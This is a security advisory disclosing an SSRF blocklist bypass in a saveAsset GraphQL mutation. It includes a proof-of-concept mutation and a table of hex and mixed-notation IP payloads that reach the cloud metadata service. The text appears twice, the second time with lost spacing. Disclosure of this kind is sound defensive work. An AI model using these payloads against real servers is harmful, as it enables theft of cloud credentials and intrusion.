I observed a recent commit intended to mitigate Server-Side Request Forgery (SSRF) vulnerabilities. While the implemented defense mechanisms are an improvement, I have identified two methods to bypass these protections. This report details the first bypass method involving alternative IP notation, while the second method will be submitted in a separate advisory.
Summary
The saveAsset GraphQL mutation uses filter_var(..., FILTER_VALIDATE_IP) to block a specific list of IP addresses. However, alternative IP notations (hexadecimal, mixed) are not recognized by this function, allowing attackers to bypass the blocklist and access cloud metadata services.
Proof of Concept
- Send the following GraphQL mutation:
mutation {
save_images_Asset(_file: {
url: "http://169.254.0xa9fe/latest/meta-data/"
filename: "metadata.txt"
}) {
id
}
}
- The IP validation passes (hex notation not recognized as IP)
- Guzzle resolves
169.254.0xa9fe to 169.254.169.254
- Cloud metadata is fetched and saved
Alternative Payloads
| Payload |
Notation |
Resolves To |
http://169.254.0xa9fe/ |
Mixed (decimal + hex) |
169.254.169.254 |
http://0xa9.0xfe.0xa9.0xfe/ |
Full hex dotted |
169.254.169.254 |
http://0xa9fea9fe/ |
Single hex integer |
169.254.169.254 |
Technical Details
File: src/gql/resolvers/mutations/Asset.php
Root Cause: filter_var($hostname, FILTER_VALIDATE_IP) only recognizes standard dotted-decimal notation. Hex representations bypass this check, but Guzzle still resolves them.
// Line 287 - Fails to catch hex notation
filter_var($hostname, FILTER_VALIDATE_IP)
References
d49e93e
I observed a recent commit intended to mitigate Server-Side Request Forgery (SSRF) vulnerabilities. While the implemented defense mechanisms are an improvement, I have identified two methods to bypass these protections. This report details the first bypass method involving alternative IP notation, while the second method will be submitted in a separate advisory.
Summary
The
saveAssetGraphQL mutation usesfilter_var(..., FILTER_VALIDATE_IP)to block a specific list of IP addresses. However, alternative IP notations (hexadecimal, mixed) are not recognized by this function, allowing attackers to bypass the blocklist and access cloud metadata services.Proof of Concept
169.254.0xa9feto169.254.169.254Alternative Payloads
http://169.254.0xa9fe/http://0xa9.0xfe.0xa9.0xfe/http://0xa9fea9fe/Technical Details
File:
src/gql/resolvers/mutations/Asset.phpRoot Cause:
filter_var($hostname, FILTER_VALIDATE_IP)only recognizes standard dotted-decimal notation. Hex representations bypass this check, but Guzzle still resolves them.References
d49e93e